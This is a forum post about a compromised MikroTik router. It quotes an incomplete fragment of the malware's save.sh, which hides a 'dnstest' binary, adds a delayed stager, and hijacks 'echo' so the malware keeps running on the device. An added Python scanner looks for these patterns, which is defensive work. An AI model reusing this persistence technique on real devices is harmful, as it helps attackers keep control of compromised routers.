The router had only winbox 8129, ssh on a changed high port and pptp on the default port. Version 6.41.3.
The password is random chars + numbers + special chars and is not used anywhere else.
Login to my router:
I updated it to the latest version and downloaded it completely from the outside.
Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help with something:
Code:
case "$PATH" in
# old versions
if [ ! -d "/flash/" ]; then
if [ -f $dest/.dnstest ]; then
if [ -f $dest/echo ]; then
if [ -f $dest/.test ]; then
mkdir -p $dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
This is not the only case; this is a log from my friend. He had only winbox exposed:
It looks like the first attempt to log in somehow miraculously collects passwords from the router, and later there is a login with user perm = full.
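An added example, not part of the original post: a Python scanner that checks an offline copy of a router filesystem for the persistence pattern visible in the save.sh fragment above (an `echo` wrapper that backgrounds a `.test` stager, which sleeps and then runs a copy from /tmp). Having an offline copy to scan, the `persist` directory name standing in for the unknown `$dest`, and the sample file contents are all constructed assumptions.

```python
import os
import re
import tempfile

# Names from the post: the two files found plus the hidden copies save.sh creates.
DROPPED_NAMES = {"save.sh", "dnstest", ".dnstest", ".test"}
# $dest/echo wrapper: background another script, then call the real /bin/echo.
WRAPPER_RE = re.compile(rb"\A#!/bin/ash\n[^\n]*&\n/bin/echo \$\*")
# $dest/.test stager: long usleep, copy a file into /tmp, execute it.
STAGER_RE = re.compile(rb"usleep \d+\ncp \S+ /tmp/\S+\n/tmp/\S+")


def scan_tree(root):
    """Return sorted (relative path, reason) findings for an offline filesystem copy."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name in DROPPED_NAMES:
                findings.append((rel, "file name seen in the post"))
            try:
                with open(path, "rb") as fh:
                    head = fh.read(4096)  # both scripts are only a few lines long
            except OSError:
                continue
            if WRAPPER_RE.search(head):
                findings.append((rel, "echo wrapper that backgrounds a script"))
            if STAGER_RE.search(head):
                findings.append((rel, "sleep, copy to /tmp, execute stager"))
    return sorted(findings)


def build_sample(root, dest="persist"):  # constructed tree; dest stands in for $dest
    files = {
        f"{dest}/echo": b"#!/bin/ash\n//persist/.test&\n/bin/echo $*\n",
        f"{dest}/.test": b"#!/bin/ash\nusleep 180000000\n"
                         b"cp /persist/.dnstest /tmp/.dnstest\n/tmp/.dnstest*\n",
        "bin/echo": b"\x7fELF constructed placeholder for the real echo",
    }
    for rel, data in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan_tree(tmp), sep="\n")
```

A name match on `.test` alone is weak evidence; the content matches on the wrapper and stager are the stronger signal.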